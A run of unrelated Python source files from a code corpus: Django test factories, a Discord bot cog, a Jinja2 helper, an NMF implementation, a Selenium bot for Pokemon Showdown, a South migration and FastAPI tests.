# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'tv', legend =True)
| StarcoderdataPython |
21303 | <filename>joplin/pages/official_documents_page/factories.py
import factory
from pages.official_documents_page.models import OfficialDocumentPage, OfficialDocumentCollectionOfficialDocumentPage
from pages.base_page.factories import JanisBasePageFactory
from pages.official_documents_collection.factories import OfficialDocumentCollectionFactory
from wagtail.documents.models import Document
class DocumentFactory(factory.DjangoModelFactory):
@classmethod
def create(cls, *args, **kwargs):
return super(DocumentFactory, cls).create(*args, **kwargs)
class Meta:
model = Document
class OfficialDocumentCollectionDocumentFactory(factory.django.DjangoModelFactory):
page = factory.SubFactory(
'official_documents_page.factories.OfficialDocumentPageFactory',
add_departments__dummy=False,
)
official_document_collection = factory.SubFactory(
OfficialDocumentCollectionFactory,
add_departments__dummy=False,
)
class Meta:
model = OfficialDocumentCollectionOfficialDocumentPage
class OfficialDocumentPageFactory(JanisBasePageFactory):
class Meta:
model = OfficialDocumentPage
# document = factory.SubFactory(
# DocumentFactory
# )
@factory.post_generation
def add_official_document_collection(self, create, extracted, **kwargs):
if extracted:
# A list of official document collections were passed in, use them
for collection in extracted['official_document_collection']:
OfficialDocumentCollectionDocumentFactory.create(page=self, official_document_collection=collection)
return
        # pass "add_official_document_collection__dummy"=True into Factory() to make dummy document collections
if create:
if kwargs.get("dummy", False):
                OfficialDocumentCollectionDocumentFactory.create_batch(2, page=self)
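# Illustrative usage sketch (hypothetical variable names; assumes a Django test context
# with the factories above):
#
#   collection = OfficialDocumentCollectionFactory.create(add_departments__dummy=False)
#   page = OfficialDocumentPageFactory.create(
#       add_official_document_collection={'official_document_collection': [collection]},
#   )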
| StarcoderdataPython |
140501 | <reponame>federicober/funk-lines
"""File for the results class."""
import statistics
from typing import List, Optional, Sequence
from .ast_processors import StmtInfo
class Results:
"""Class for holding the results of an analysis.
The Analyser classes return a Result object.
"""
def __init__(self, total_lines: int, definitions: Sequence[StmtInfo]):
"""Result constructor.
Args:
total_lines: Total number of lines
definitions: Sequence of functions and classes
"""
self._total_lines: int = total_lines
self._definitions: List[StmtInfo] = list(definitions)
@property
def total_lines(self) -> int:
"""Total number of lines."""
return self._total_lines
@property
def nbr_definitions(self) -> int:
"""Total number of functions and classes."""
return len(self._definitions)
@property
def definitions(self) -> List[StmtInfo]:
"""List of statement info objects for all functions and classes."""
return self._definitions.copy()
@property
def lines_per_function(self) -> Optional[float]:
"""Mean number of lines per definition."""
if self._definitions:
return statistics.mean(def_.n_lines for def_ in self._definitions)
return None
def __add__(self, other: "Results") -> "Results":
"""Combines two results.
Args:
other: another Result object
Returns:
Combined results
"""
return self.__class__(
total_lines=self.total_lines + other.total_lines,
definitions=self._definitions + other.definitions,
)
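# Minimal usage sketch (illustrative only; the numbers and StmtInfo lists are hypothetical --
# real StmtInfo objects come from the ast_processors module):
#
#   r1 = Results(total_lines=120, definitions=stmt_infos_a)
#   r2 = Results(total_lines=80, definitions=stmt_infos_b)
#   combined = r1 + r2            # 200 total lines, definitions concatenated
#   combined.lines_per_function   # mean n_lines over all definitions, or None if empty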
| StarcoderdataPython |
1736665 | import asyncio
from discord.ext import commands
from discord_slash import SlashContext, cog_ext
class Ping(commands.Cog):
def __init__(self, bot):
self.bot = bot
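        # Schedules a one-off sync of all registered slash commands when the cog is constructed;
        # this assumes an event loop is already running at cog-load time.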
asyncio.create_task(self.bot.slash.sync_all_commands())
def cog_unload(self):
self.bot.slash.remove_cog_commands(self)
@cog_ext.cog_slash(name='ping', description='このBotのレイテンシを返します。')
async def slash_say(self, ctx: SlashContext):
msg = await ctx.send('pong!')
await msg.edit(content=f"pong!\n`{self.bot.ws.latency * 1000:.0f}ms`")
def setup(bot):
bot.add_cog(Ping(bot))
| StarcoderdataPython |
189289 | # Via http://pydanny.com/jinja2-quick-load-function.html
from jinja2 import FileSystemLoader, Environment, StrictUndefined
def render_from_template(directory, template_name, **kwargs):
loader = FileSystemLoader(directory)
env = Environment(loader=loader, undefined=StrictUndefined)
template = env.get_template(template_name)
return template.render(**kwargs)
if __name__ == "__main__":
import os
import sys
import yaml
if len(sys.argv) > 1:
filename = sys.argv[2]
thisdir = os.path.dirname(os.path.join(os.getcwd(), filename))
else:
filename = "remotes.yaml"
thisdir = os.path.dirname(__file__)
with open(os.path.join(thisdir, filename)) as f:
        params = yaml.safe_load(f.read())
for filename in [
"remote.lua",
#"layout.xml.jinja2",
]:
with open(os.path.join(thisdir, filename), "w") as f:
f.write(render_from_template(thisdir, "%s.jinja2" % filename, **params))
| StarcoderdataPython |
1751642 | import os
import yaml
class Project(object):
def __init__(self, data, source=None, dir=None, annotation=None):
self.data = data
self.source = source
self.dir = dir
self.annotation = annotation
self.command_line_flags = []
self.command_line_profiles = []
def attr(self, name, default=None):
return self.data.get(name, default)
def sections(self, heading):
sections = self.data.get(heading, {})
keys = list(sections.keys())
keys.sort()
return [Section([heading, key], sections[key], self) for key in keys]
def section(self, heading, key):
data = self.data.get(heading, {}).get(key)
if data:
return Section([heading, key], data, self)
else:
return None
def default_section(self, heading):
sections = self.sections(heading)
if len(sections) == 1:
return sections[0]
else:
for s in self.sections(heading):
if s.attr("default") is True:
return s
return None
def flags(self):
return self.data.get("flags", {})
def all_flags(self):
return _merge_flags(
self.command_line_flags,
_resolve_profile_flags(self),
self.flags())
def reload(self):
if self.source:
self.data = _load_data(self.source)
class Section(object):
def __init__(self, path, data, project):
self.path = path
self.data = data
self.project = project
def attr(self, key, default=None):
return self.data.get(key, default)
def flags(self):
return self.attr("flags", {})
def all_flags(self):
return _merge_flags(
self.project.command_line_flags,
_resolve_profile_flags(self.project),
self.flags(),
self.project.flags())
def _merge_flags(*list_of_flags):
merged = []
for flags in list_of_flags:
for name, val in _iter_flags(flags):
if not _has_flag(name, merged):
merged.append((name, val))
return merged
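# Illustrative note (not from the original project): _merge_flags keeps the first
# occurrence of each flag name, so earlier sources take precedence. For example
# (hypothetical values):
#   _merge_flags([("epochs", 5)], {"epochs": 10, "lr": 0.1})
#   -> [("epochs", 5), ("lr", 0.1)]
# This is why command-line flags override profile flags, which in turn override
# project-level flags in all_flags() above.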
def _iter_flags(flags):
try:
return flags.items()
except AttributeError:
return flags
def _resolve_profile_flags(project):
resolved = []
for profile_name in project.command_line_profiles:
profile = project.section("profiles", profile_name)
if profile:
resolved = _merge_flags(profile.data, resolved)
return resolved
def _has_flag(name, flags):
for flag_name, _ in flags:
if flag_name == name:
return True
return False
def from_dir(path, name="guild.yml"):
return from_file(os.path.join(path, name))
def from_file(path):
return Project(_load_data(path), path, os.path.dirname(path))
def _load_data(path):
with open(path, "r") as f:
        return yaml.safe_load(f)
def from_string(s, path="__str__"):
    return Project(yaml.safe_load(s), path)
def copy_with_new_data(project, data):
return Project(
data,
project.source,
project.dir,
project.annotation)
| StarcoderdataPython |
3329799 | <filename>networks.py
import pandas as pd
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
from PNL import *
from progress.bar import Bar
from ast import literal_eval
df = pd.read_csv('data/essays.csv')
df_save = pd.DataFrame(columns=['final_score','c1', 'c2', 'c3', 'c4', 'c5',
                                'nodes', 'edges', 'out_degrees','clustering_coefficient','shortest_path_length',
                                'shortest_path_length_inverse_weighted', 'assortativity', 'density', 'degree_centrality',
'betweenness_centrality', 'closeness_centrality', 'pagerank'])
bar = Bar('Processing', max=len(df))
for index in range(len(df)):
text = df.iloc[index]['text']
nodes = preprocessing_text(text)
edges = [[nodes[i], nodes[i+1]] for i in range(len(nodes)-1)]
G = nx.DiGraph()
G.add_nodes_from(nodes)
G.add_edges_from(edges)
edges_weight = dict((','.join(edge), edges.count(edge)) for edge in edges)
max_weight = max(edges_weight.values())
for u, v, d in G.edges(data=True):
d['weight'] = edges_weight[f'{u},{v}']
d['inverse_weight'] = 1 / edges_weight[f'{u},{v}']
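        # Note: 1/weight is stored as "inverse_weight" so that frequently repeated word
        # transitions behave as short distances in the weighted shortest-path computation
        # below (strong links -> small path length).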
nodes_count = G.number_of_nodes()
edges_count = G.number_of_edges()
out_degrees = dict(G.out_degree(G.nodes(), 'weight'))
mean_out_degrees = np.mean(list(out_degrees.values()))
clustering_coefficient = nx.clustering(G, G.nodes())
mean_clustering_coefficient = np.mean(list(clustering_coefficient.values()))
average_shortest_path_inverse_weight = nx.average_shortest_path_length(G, 'inverse_weight')
average_shortest_path = nx.average_shortest_path_length(G)
assortativity = nx.degree_assortativity_coefficient(G, x='out', y='out', weight='weight')
density = nx.density(G)
degree_centrality = nx.out_degree_centrality(G)
mean_degree_centrality = np.mean(list(degree_centrality.values()))
betweenness_centrality = nx.betweenness_centrality(G, endpoints=True)
mean_betweenness_centrality = np.mean(list(betweenness_centrality.values()))
closeness_centrality = nx.closeness_centrality(G)
mean_closeness_centrality = np.mean(list(closeness_centrality.values()))
pagerank = nx.pagerank(G, weight='weight')
mean_pagerank = np.mean(list(pagerank.values()))
criteria = literal_eval(df.iloc[index]['criteria_scores'])
df_save.loc[index] = [df.iloc[index]['final_score'], criteria['Competência 1'], criteria['Competência 2'], criteria['Competência 3'], criteria['Competência 4'], criteria['Competência 5'], nodes_count, edges_count, mean_out_degrees, mean_clustering_coefficient, average_shortest_path, average_shortest_path_inverse_weight, assortativity, density, mean_degree_centrality, mean_betweenness_centrality, mean_closeness_centrality, mean_pagerank]
bar.next()
df_save.to_csv(r'data/network_data.csv', header=True, index=False)
bar.finish()
| StarcoderdataPython |
1767921 | <reponame>douzepouze/python-mcumgr
from mcumgr import *
| StarcoderdataPython |
3392490 | <filename>msaf/pymf/nmfals.py
#!/usr/bin/python
#
# Copyright (C) <NAME>, 2010.
# Licensed under the GNU General Public License (GPL).
# http://www.gnu.org/licenses/gpl.txt
"""
PyMF Non-negative Matrix Factorization.
NMFALS: Class for Non-negative Matrix Factorization using alternating least
squares optimization (requires cvxopt)
[1] <NAME>. and <NAME>. (1999), Learning the Parts of Objects by Non-negative
Matrix Factorization, Nature 401(6755), 788-799.
"""
import numpy as np
from cvxopt import solvers, base
from nmf import NMF
__all__ = ["NMFALS"]
class NMFALS(NMF):
"""
NMF(data, num_bases=4)
Non-negative Matrix Factorization. Factorize a data matrix into two matrices
    s.t. F = | data - W*H | is minimal. H and W are restricted to non-negative
    data. Uses an alternating least squares procedure (quite slow for larger
data sets)
Parameters
----------
data : array_like, shape (_data_dimension, _num_samples)
the input data
num_bases: int, optional
Number of bases to compute (column rank of W and row rank of H).
4 (default)
Attributes
----------
W : "data_dimension x num_bases" matrix of basis vectors
H : "num bases x num_samples" matrix of coefficients
ferr : frobenius norm (after calling .factorize())
Example
-------
Applying NMF to some rather stupid data set:
>>> import numpy as np
>>> data = np.array([[1.0, 0.0, 2.0], [0.0, 1.0, 1.0]])
>>> nmf_mdl = NMFALS(data, num_bases=2)
>>> nmf_mdl.factorize(niter=10)
The basis vectors are now stored in nmf_mdl.W, the coefficients in nmf_mdl.H.
To compute coefficients for an existing set of basis vectors simply copy W
to nmf_mdl.W, and set compute_w to False:
>>> data = np.array([[1.5], [1.2]])
>>> W = np.array([[1.0, 0.0], [0.0, 1.0]])
>>> nmf_mdl = NMFALS(data, num_bases=2)
>>> nmf_mdl.W = W
>>> nmf_mdl.factorize(niter=1, compute_w=False)
The result is a set of coefficients nmf_mdl.H, s.t. data = W * nmf_mdl.H.
"""
def update_h(self):
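        # Each column h_i of H solves the non-negative least-squares problem
        #   min_h 0.5 * h^T (W^T W) h - (W^T data[:, i])^T h   s.t.  h >= 0,
        # which is equivalent (up to a constant) to min_h ||data[:, i] - W h||^2 with h >= 0.
        # cvxopt's qp solver receives P = W^T W (HA), q = -W^T data[:, i] (FA) and the
        # inequality constraint -I h <= 0 (INQa, INQb).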
def updatesingleH(i):
# optimize alpha using qp solver from cvxopt
FA = base.matrix(np.float64(np.dot(-self.W.T, self.data[:,i])))
al = solvers.qp(HA, FA, INQa, INQb)
self.H[:,i] = np.array(al['x']).reshape((1,-1))
# float64 required for cvxopt
HA = base.matrix(np.float64(np.dot(self.W.T, self.W)))
INQa = base.matrix(-np.eye(self._num_bases))
INQb = base.matrix(0.0, (self._num_bases,1))
map(updatesingleH, xrange(self._num_samples))
def update_w(self):
def updatesingleW(i):
# optimize alpha using qp solver from cvxopt
FA = base.matrix(np.float64(np.dot(-self.H, self.data[i,:].T)))
al = solvers.qp(HA, FA, INQa, INQb)
self.W[i,:] = np.array(al['x']).reshape((1,-1))
# float64 required for cvxopt
HA = base.matrix(np.float64(np.dot(self.H, self.H.T)))
INQa = base.matrix(-np.eye(self._num_bases))
INQb = base.matrix(0.0, (self._num_bases,1))
map(updatesingleW, xrange(self._data_dimension))
| StarcoderdataPython |
3247994 | <filename>tests/test_travis_project_exists.py<gh_stars>1-10
from setup_python_package.utils import travis_project_exists
def test_travis_project_exists():
assert travis_project_exists() | StarcoderdataPython |
1690449 | <reponame>Arastorn/Pokemon_RL
import time
import re
import random
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from app.src.showdownai.exceptions import *
class Selenium():
BASE_URL="http://play.pokemonshowdown.com"
def __init__(self, url=BASE_URL, timer_on=False, proxy=False, browser='chrome', lib_dir="app/lib/linux64/"):
self.url = url
self.timer_on = timer_on
self.browser = browser
self.lib_dir = lib_dir
chrome_path = self.lib_dir + "chromedriver"
self.driver = webdriver.Chrome(executable_path=chrome_path)
def start_driver(self):
print("Starting driver...")
self.driver.get(self.url)
def get_state(self):
url = self.driver.current_url
if "battle" in url:
return "battle"
else:
return "lobby"
def wait_home_page(self):
print("Waiting for home page to load...")
while self.driver.find_element_by_css_selector(".select.formatselect").get_attribute('value') != "gen7randombattle":
time.sleep(1)
def login(self, username, password):
self.wait_home_page()
print("Logging in...")
self.click_on_element_name("login")
self.write_in_element_name("username",username)
while not self.check_exists_by_name("password"):
time.sleep(1)
self.write_in_element_name("password",password)
def choose_tier(self, tier='gen7ou'):
try:
print("Selecting tier...")
while not self.check_exists_by_css_selector(".select.formatselect"):
time.sleep(1)
self.click_on_element_css(".select.formatselect")
self.click_on_element_css("[name='selectFormat'][value='%s']" % tier)
except:
raise TierException()
def start_ladder_battle(self):
print("Starting ladder battle!")
url = self.driver.current_url
self.click_on_element_css(".button.big")
battle_click = True
if url == self.driver.current_url and self.check_exists_by_name("username"):
ps_overlay = self.driver.find_element_by_xpath("/html/body/div[4]")
ps_overlay.click()
battle_click = False
while url == self.driver.current_url and self.check_exists_by_name("login"):
time.sleep(1)
if url == self.driver.current_url and not battle_click:
self.click_on_element_css(".button.big")
while url == self.driver.current_url:
time.sleep(1.5)
def start_challenge_battle(self, name, tier='gen7ou'):
print("Starting challenge battle!")
self.click_on_element_css(".button.mainmenu5.onlineonly")
if self.check_exists_by_css_selector(".textbox.autofocus"):
self.write_in_element_css(".textbox.autofocus",name)
else:
print("%s is not online...exiting now" % name)
raise UserNotOnlineException()
time.sleep(3)
#ps_overlay = self.driver.find_element_by_xpath("/html/body/div[4]")
#challenge = ps_overlay.find_element_by_css_selector("[name='pm']")
#challenge.click()
#time.sleep(2)
print("Waiting for user to click on challenge !")
while not self.check_exists_by_css_selector(".challenge"):
time.sleep(1)
challengeWindow = self.driver.find_element_by_css_selector(".challenge")
formatCombat = challengeWindow.find_element_by_css_selector(".select.formatselect")
formatCombat.click()
time.sleep(2)
self.click_on_element_css("[name='selectFormat'][value='gen7ou']")
make_challenge = challengeWindow.find_element_by_css_selector("[name='makeChallenge']")
make_challenge.click()
print("Sent a challenge!")
def get_battle_id(self):
url = self.driver.current_url
url_list = url.split('-')
id = url_list[-2:]
return '-'.join(id)
def make_team(self, team):
print("Making team...")
self.click_on_element_css(".button[value='teambuilder']")
self.click_on_element_css("[name='newTop']")
self.click_on_element_css(".button.big[name='import']")
textfield = self.driver.find_element_by_css_selector(".teamedit .textbox")
textfield.send_keys(team)
self.click_on_element_css(".savebutton[name='saveImport']")
        # Click on the OU format
while not self.check_exists_by_css_selector(".teambuilderformatselect"):
time.sleep(1)
self.click_on_element_css(".teambuilderformatselect")
self.click_on_element_css("[name='selectFormat'][value='gen7ou']")
self.click_on_element_css(".button[name='validate']")
while not self.check_exists_by_css_selector(".autofocus"):
time.sleep(1)
self.click_on_element_css(".autofocus")
self.click_on_element_css(".closebutton[name='closeRoom']")
def waiting_opponent_action(self):
print("Waiting opponent action...")
move_exists = self.check_exists_by_css_selector(".movemenu") or self.check_exists_by_css_selector(".switchmenu")
while move_exists == False:
try:
time.sleep(2)
#self.start_timer()
except:
pass
time.sleep(2)
move_exists = self.check_exists_by_css_selector(".movemenu") or self.check_exists_by_css_selector(".switchmenu")
if self.check_exists_by_css_selector("[name='saveReplay']"):
self.chat("gg")
self.click_on_element_css("[name='saveReplay']")
while not self.check_exists_by_id(self.get_battle_id()):
time.sleep(1)
self.click_on_element_css(".ps-overlay")
raise GameOverException()
def start_timer(self):
if self.check_exists_by_name("openTimer"):
timer = self.driver.find_element_by_name("openTimer")
if timer.text == "Timer":
timer.click()
if self.check_exists_by_name("timerOn"):
print("Starting timer...")
self.click_on_element_name("timerOn")
self.timer_on = True
def random_Attack(self):
print("Making a move...")
if (self.check_alive()) and (self.check_exists_by_css_selector(".movemenu")):
if self.check_exists_by_name('megaevo'):
self.click_on_element_name("megaevo")
attacks = self.driver.find_elements_by_css_selector(".movemenu button")
if(len(attacks)>0):
                randomAttack = random.randint(0, len(attacks) - 1)  # randint is inclusive, so the first listed move is also a valid pick
self.attack_Information(attacks[randomAttack])
attacks[randomAttack].click()
else:
self.switch_pokemon_random()
self.waiting_opponent_action()
def attack_Information(self, attack):
attack_name = attack.get_attribute("data-move")
type = attack.find_element_by_css_selector(".type").text
pp = attack.find_element_by_css_selector(".pp").text
print("Attack used : ", attack_name)
print("Type of the attack : ", type)
print("pp left on the attack : ", pp)
def choose_pokemon_at_game_start(self, index):
print("Choosing first Pokemon...")
choose = self.driver.find_elements_by_name("chooseTeamPreview")[index]
choose.click()
self.waiting_opponent_action()
def switch_pokemon_random(self):
print("Switching Pokemon Randomly...")
switchMenu = self.driver.find_element_by_css_selector(".switchmenu")
pokemonsAvailable = switchMenu.find_elements_by_css_selector("[name='chooseSwitch']")
        # Pick one of the available Pokemon at random
        if(len(pokemonsAvailable) > 0 ):
            randomPokemon = random.randint(0, len(pokemonsAvailable) - 1)
pokemonsAvailable[randomPokemon].click()
def get_my_primary(self):
if self.check_exists_by_css_selector(".rstatbar strong"):
text = self.driver.find_element_by_css_selector(".rstatbar strong").text
poke = text
return poke
def get_opponent_primary(self):
if self.check_exists_by_css_selector(".lstatbar strong"):
text = self.driver.find_element_by_css_selector(".lstatbar strong").text
poke = text
return poke
def get_my_primary_health(self):
if self.check_exists_by_css_selector(".rstatbar .hpbar .hptext"):
hp_text = self.driver.find_element_by_css_selector(".rstatbar .hpbar .hptext")
hp = hp_text.text.strip("%")
hp = int(hp)
else:
hp = 0
return hp
def get_opponent_primary_health(self):
if self.check_exists_by_css_selector(".lstatbar .hpbar .hptext"):
hp_text = self.driver.find_element_by_css_selector(".lstatbar .hpbar .hptext")
hp = hp_text.text.strip("%")
hp = int(hp)
else:
hp = 0
return hp
def get_my_team(self):
if self.check_exists_by_css_selector(".leftbar .trainer .teamicons"):
my_team_element = self.driver.find_elements_by_css_selector(".leftbar .trainer .teamicons span")
my_team = []
for element in my_team_element:
pokemon_name = element.get_attribute("title")
my_team.append(pokemon_name)
return my_team
def get_opponent_team(self):
if self.check_exists_by_css_selector(".rightbar .trainer .teamicons"):
my_team_element = self.driver.find_elements_by_css_selector(".rightbar .trainer .teamicons span")
my_team = []
for element in my_team_element:
pokemon_name = element.get_attribute("title")
my_team.append(pokemon_name)
return my_team
def check_alive(self):
return self.check_exists_by_css_selector(".rstatbar")
def chat(self, message):
chatbox = self.driver.find_elements_by_css_selector(".chatbox .textbox")[-1]
chatbox.send_keys(message)
chatbox.send_keys(Keys.RETURN)
def click_on_element_name(self,element):
try:
self.driver.find_element_by_name(element).click()
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def click_on_element_css(self,element):
try:
self.driver.find_element_by_css_selector(element).click()
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def write_in_element_name(self,element,stringToWrite):
try:
elem = self.driver.find_element_by_name(element)
elem.send_keys(stringToWrite)
elem.send_keys(Keys.RETURN)
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def write_in_element_css(self,element,stringToWrite):
try:
elem = self.driver.find_element_by_css_selector(element)
elem.send_keys(stringToWrite)
elem.send_keys(Keys.RETURN)
time.sleep(1)
except NoSuchElementException:
print("Element : " + element + " Not Found")
def check_exists_by_xpath(self, xpath):
try:
self.driver.find_element_by_xpath(xpath)
except NoSuchElementException:
return False
return True
def check_exists_by_id(self, id):
try:
self.driver.find_element_by_id(id)
except NoSuchElementException:
return False
return True
def check_exists_by_name(self, name):
try:
self.driver.find_element_by_name(name)
except NoSuchElementException:
return False
return True
def check_exists_by_class(self, cls):
try:
self.driver.find_elements_by_class_name(cls)
except NoSuchElementException:
return False
return True
def check_exists_by_css_selector(self, css, elem=None):
try:
if elem:
result = elem.find_elements_by_css_selector(css)
else:
result = self.driver.find_elements_by_css_selector(css)
return len(result) > 0
except NoSuchElementException:
return False
def get_log(self):
log = self.driver.find_element_by_css_selector(".battle-log")
return log.text.encode('utf-8')
def reset(self):
self.driver.get(self.url)
time.sleep(2)
def close(self):
self.driver.close()
def clear_cookies(self):
self.driver.execute_script("localStorage.clear();")
def turn_off_sound(self):
print("Turning off sound...")
self.click_on_element_css(".icon[name='openSounds']")
self.click_on_element_css("[name='muted']")
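
# Minimal usage sketch (assumes valid Showdown credentials and a chromedriver under app/lib/linux64/;
# the account name and password below are placeholders):
if __name__ == "__main__":
    client = Selenium(timer_on=True)
    client.start_driver()
    client.login("my_username", "my_password")
    client.choose_tier("gen7randombattle")
    client.start_ladder_battle()
    try:
        while True:
            client.random_Attack()  # keep picking moves until the battle ends
    except GameOverException:
        print(client.get_log())
    finally:
        client.close()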
| StarcoderdataPython |
24729 | <filename>oembed/migrations/0001_initial.py
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.conf import settings
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'StoredOEmbed'
db.create_table('oembed_storedoembed', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('match', self.gf('django.db.models.fields.TextField')()),
('response_json', self.gf('django.db.models.fields.TextField')()),
('resource_type', self.gf('django.db.models.fields.CharField')(max_length=8)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('date_expires', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('maxwidth', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('maxheight', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('object_id', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='related_storedoembed', null=True, to=orm['contenttypes.ContentType'])),
))
db.send_create_signal('oembed', ['StoredOEmbed'])
# Adding unique constraint on 'StoredOEmbed', fields ['match', 'maxwidth', 'maxheight']
if 'mysql' not in settings.DATABASES['default']['ENGINE']:
db.create_unique('oembed_storedoembed', ['match', 'maxwidth', 'maxheight'])
# Adding model 'StoredProvider'
db.create_table('oembed_storedprovider', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('endpoint_url', self.gf('django.db.models.fields.CharField')(max_length=255)),
('regex', self.gf('django.db.models.fields.CharField')(max_length=255)),
('wildcard_regex', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('resource_type', self.gf('django.db.models.fields.CharField')(max_length=8)),
('active', self.gf('django.db.models.fields.BooleanField')(default=False, blank=True)),
('provides', self.gf('django.db.models.fields.BooleanField')(default=False, blank=True)),
('scheme_url', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
))
db.send_create_signal('oembed', ['StoredProvider'])
# Adding model 'AggregateMedia'
db.create_table('oembed_aggregatemedia', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('url', self.gf('django.db.models.fields.TextField')()),
('object_id', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='aggregate_media', null=True, to=orm['contenttypes.ContentType'])),
))
db.send_create_signal('oembed', ['AggregateMedia'])
def backwards(self, orm):
# Deleting model 'StoredOEmbed'
db.delete_table('oembed_storedoembed')
# Removing unique constraint on 'StoredOEmbed', fields ['match', 'maxwidth', 'maxheight']
if 'mysql' not in settings.DATABASES['default']['ENGINE']:
db.delete_unique('oembed_storedoembed', ['match', 'maxwidth', 'maxheight'])
# Deleting model 'StoredProvider'
db.delete_table('oembed_storedprovider')
# Deleting model 'AggregateMedia'
db.delete_table('oembed_aggregatemedia')
models = {
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'oembed.aggregatemedia': {
'Meta': {'object_name': 'AggregateMedia'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'aggregate_media'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {})
},
'oembed.storedoembed': {
'Meta': {'ordering': "('-date_added',)", 'unique_together': "(('match', 'maxwidth', 'maxheight'),)", 'object_name': 'StoredOEmbed'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'related_storedoembed'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match': ('django.db.models.fields.TextField', [], {}),
'maxheight': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'maxwidth': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'resource_type': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'response_json': ('django.db.models.fields.TextField', [], {})
},
'oembed.storedprovider': {
'Meta': {'ordering': "('endpoint_url', 'resource_type', 'wildcard_regex')", 'object_name': 'StoredProvider'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'endpoint_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'provides': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'regex': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'resource_type': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'scheme_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'wildcard_regex': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
}
}
complete_apps = ['oembed']
| StarcoderdataPython |
3372020 | from pathlib import Path
import randomname
def test_get_name():
name = randomname.get_name('music_theory', 'cats').split('-', 1)
assert len(name) > 1
assert name[0] in randomname.util.get_groups_list('a/music_theory')
assert name[1] in randomname.util.get_groups_list('n/cats')
assert 'asdf' in randomname.util.get_groups_list(['n/cats', 'asdf'])
def test_generate():
name = randomname.generate('n/cats', 'a/music_theory', 'n/food').split('-', 2)
assert len(name) > 2
assert name[0] in randomname.util.get_groups_list('n/cats')
assert name[1] in randomname.util.get_groups_list('a/music_theory')
assert name[2] in randomname.util.get_groups_list('n/food')
assert name[0] not in randomname.util.get_groups_list('n/food')
def test_generated_names_are_valid_file_names(tmp_path: Path):
random_names = [randomname.generate() for _ in range(10)]
for name in random_names:
# does not raise
(Path(tmp_path) / name).touch()
| StarcoderdataPython |
3272326 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import unittest
import unittest.mock as mock
from fastapi.testclient import TestClient
from projects.api.main import app
from projects.database import session_scope
import tests.util as util
app.dependency_overrides[session_scope] = util.override_session_scope
TEST_CLIENT = TestClient(app)
class TestMetrics(unittest.TestCase):
maxDiff = None
def setUp(self):
"""
Sets up the test before running it.
"""
util.create_mocks()
def tearDown(self):
"""
Deconstructs the test after running it.
"""
util.delete_mocks()
def test_list_metrics_project_not_found(self):
"""
Should return an http status 404 and an error message.
"""
project_id = "unk"
experiment_id = "unk"
run_id = "unk"
operator_id = "unk"
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
)
result = rv.json()
expected = {
"message": "The specified project does not exist",
"code": "ProjectNotFound",
}
self.assertDictEqual(expected, result)
self.assertEqual(rv.status_code, 404)
def test_list_metrics_experiment_not_found(self):
"""
Should return an http status 404 and an error message.
"""
project_id = util.MOCK_UUID_1
experiment_id = "unk"
run_id = "unk"
operator_id = "unk"
rv = TEST_CLIENT.get(
f"/projects/{project_id}/experiments/{experiment_id}/runs/{run_id}/operators/{operator_id}/metrics"
